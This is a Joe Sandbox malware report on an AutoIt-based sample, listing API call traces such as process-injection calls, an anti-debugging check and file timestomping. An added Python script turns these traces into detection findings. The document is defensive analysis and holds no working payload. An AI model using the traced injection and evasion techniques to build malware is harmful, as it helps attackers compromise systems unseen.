                    • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                    • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                    • Opcode Fuzzy Hash: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                    • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,00AE55C0,?,00000000,00000000), ref: 00AE5A51
                    • RtlExitUserThread.NTDLL(00000000), ref: 00AE5B11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Thread$CreateExitUser
                    • String ID:
                    • API String ID: 4108186749-0
                    • Opcode ID: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                    • Instruction ID: 4c0e890f41b165d1405dfb9384ffdda4ba42f96ee39974d860ac71d66c7052f7
                    • Opcode Fuzzy Hash: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                    • Instruction Fuzzy Hash: FB113D11D0DBC14ED723877A68753666FA01FA3738F1D06DAD0908E0E3D2995D0D93A3
                    APIs
                    • IsThemeActive.UXTHEME ref: 00404834
                      • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                      • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                      • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                      • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                      • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                      • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                      • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                    • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                    • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                    • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
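The function blocks above are machine-generated, but their API lines encode behaviour a triager reads by hand: GetTempFileNameW with the "aut" prefix (the temp-file naming AutoIt's runtime uses), CreateFileW with GENERIC_WRITE (0x40000000) followed by SetFileTime (timestomping), CreateThread with a start address inside the 0x00AE0000 region that the report marks "based on PE: false", the IsDebuggerPresent subcall, and MultiByteToWideChar with code page 0xFDE9 (65001, CP_UTF8). The script below is an added example, not Joe Sandbox's code or the sample's: it parses API lines and "Source File" lines in exactly the format shown on this page and turns them into triage findings. The sample input is constructed from lines copied off this page. Two things are assumptions of mine: the heuristics themselves are a starting point, not the sandbox's signature logic, and the interpretation of the dotted field right after the base address in the .sdmp name as a Windows page-protection value (0x20, 0x40 and 0x80 seen here match PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY) is inferred from the values, not documented by the report.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Windows constants (winnt.h / winbase.h), not report-specific.
PAGE_EXECUTE_READWRITE = 0x40
GENERIC_WRITE = 0x40000000
CP_UTF8 = 65001  # 0xFDE9 as it appears in the trace

# One API line of the report's function listing, e.g.
#   • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
#   • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# The "Source File" line that names the dumped region the block came from.
SRC_RE = re.compile(
    r"Source File:\s*(?P<sdmp>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]{8}),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: Optional[int]  # parent function when the line is a "Part of subcall"

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    region_base: Optional[int] = None
    pe_backed: Optional[bool] = None
    protect: Optional[int] = None

def parse_block(text: str) -> FunctionBlock:
    blk = FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            blk.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
            continue
        m = SRC_RE.search(line)
        if m:
            blk.region_base = int(m["off"], 16)
            blk.pe_backed = m["pe"] == "true"
            # Assumption: field 4 of the .sdmp name is the page protection
            # (0x20 / 0x40 / 0x80 seen in this report fit PAGE_EXECUTE_*).
            fields = m["sdmp"].split(".")
            if len(fields) > 4:
                blk.protect = int(fields[4], 16)
    return blk

def _hex_arg(call: Call, i: int) -> Optional[int]:
    """Return argument i as an int, or None for '?', strings and missing args."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

def triage(blk: FunctionBlock) -> list:
    findings = []
    names = [c.api for c in blk.calls]
    for idx, c in enumerate(blk.calls):
        if c.api == "GetTempFileNameW" and len(c.args) > 1 and c.args[1] == "aut":
            findings.append("GetTempFileNameW with AutoIt-style 'aut' prefix")
        if c.api == "CreateFileW":
            access = _hex_arg(c, 1)
            if access is not None and access & GENERIC_WRITE and "SetFileTime" in names[idx + 1:]:
                findings.append("CreateFileW(GENERIC_WRITE) then SetFileTime: timestomping pattern")
        if c.api == "CreateThread":
            start = _hex_arg(c, 2)
            # The dump gives no region size, so only the lower bound is checked.
            if start is not None and blk.pe_backed is False and blk.region_base is not None \
                    and start >= blk.region_base:
                findings.append(f"CreateThread start 0x{start:08X} in non-PE region 0x{blk.region_base:08X}")
        if c.api == "IsDebuggerPresent":
            findings.append("IsDebuggerPresent anti-debug check")
        if c.api == "MultiByteToWideChar" and _hex_arg(c, 0) == CP_UTF8:
            findings.append("MultiByteToWideChar with CP_UTF8 (0xFDE9)")
    if blk.pe_backed is False and blk.protect == PAGE_EXECUTE_READWRITE:
        findings.append("code dumped from RWX memory not backed by a PE image")
    return findings

# Constructed sample: lines copied from this report's function blocks.
SAMPLE_MAIN = """\
• Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 004698BB
• SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 004698D1
• CloseHandle.KERNEL32(00000000,?), ref: 004698D8
  • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000), ref: 0040807A
"""
SAMPLE_STAGE = """\
• Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
• CreateThread.KERNEL32(00000000,00000000,00AE55C0,?,00000000,00000000), ref: 00AE5A51
• RtlExitUserThread.NTDLL(00000000), ref: 00AE5B11
"""

if __name__ == "__main__":
    for name, sample in (("main module", SAMPLE_MAIN), ("0xAE0000 stage", SAMPLE_STAGE)):
        print(name)
        for f in triage(parse_block(sample)):
            print("  -", f)
```

Run it over the report text saved from the page and it prints one finding list per block; the non-PE, RWX region at 0x00AE0000 is the one to dump and scan first, since it is where the ComputerName and CreateThread code lives rather than the AutoIt runtime in the main image.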
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                    • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                    • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                    • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                    APIs
                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    • std::exception::exception.LIBCMT ref: 00420DEC
                    • __CxxThrowException@8.LIBCMT ref: 00420E01
                      • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                    • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                    • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                    • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                    • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                    • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                    • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                    APIs
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • __lock_file.LIBCMT ref: 004253EB
                      • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                    • __fclose_nolock.LIBCMT ref: 004253F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                    • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                    • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                    • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                      • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$_memmove
                    • String ID:
                    • API String ID: 3033907384-0
                    • Opcode ID: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                    • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                    • Opcode Fuzzy Hash: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                    • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                    APIs
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AE5D6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                    • Instruction ID: 6c5ccc8735a7216ab8ac895f8f0751dafe711991a9eeb3556d3479dff73ca81b
                    • Opcode Fuzzy Hash: bc29a9486419719ca63077715cc0f48772d0f8b1a36a9c0023732f1521483a65
                    • Instruction Fuzzy Hash: F7F08955E04FD0EBDE7FD37BFDCEB712A506F1272DF0C4145A2455A0B286965C16C502
                    APIs
                    • CreateProcessW.KERNEL32(?,00000000), ref: 00C2F4AB
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C2F541
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C2F563
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: d7cb7e8f9ffbe6e2981b3b265ae7e4540abe0c2656467c5c819c7d982faa8fff
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 1E12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                    • Instruction ID: ef9c8e57f5c43f6004cebfb2586242c8bee8f2060bd466ac80db703b7598509d
                    • Opcode Fuzzy Hash: 86197de6b93524e9aea76b601f03e4973b681045060dfe3bf1b6a9407a274384
                    • Instruction Fuzzy Hash: 2171C331C0CBD05EC73A873BA814675BBB06B763ACF4D8A9AD0958B1E3D6718D449392
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                    • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                    • Opcode Fuzzy Hash: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                    • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                    • Instruction ID: 703fb4e51e7414ef2a0eeb7bc43b43b7e3b383bd1c29d48b3ed1298fc8db5a6e
                    • Opcode Fuzzy Hash: 1c7307e7605e178a4f46017bc53961ffd2370cd713617fee4c5c10c45acb9c04
                    • Instruction Fuzzy Hash: FD319279A08612AFC714DF19D490A62F7E0FF09310B54C57EE98A9B791D734E841CB8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                    • Instruction ID: ba0183b72a38e380850a532ede5ae113a0cd8e0fc52491e9de17607f2509cde7
                    • Opcode Fuzzy Hash: e64beda50162301ea35b91e6c0367e5acc081ec0b5a9796b4419f91fb16ebd91
                    • Instruction Fuzzy Hash: 2A31F071D0C3D18ACB36CB2BC548379BBB06BB27E4F4C8E9AD1858B1E2D6758C049752
                    APIs
                    • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                    • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                    • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                    • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
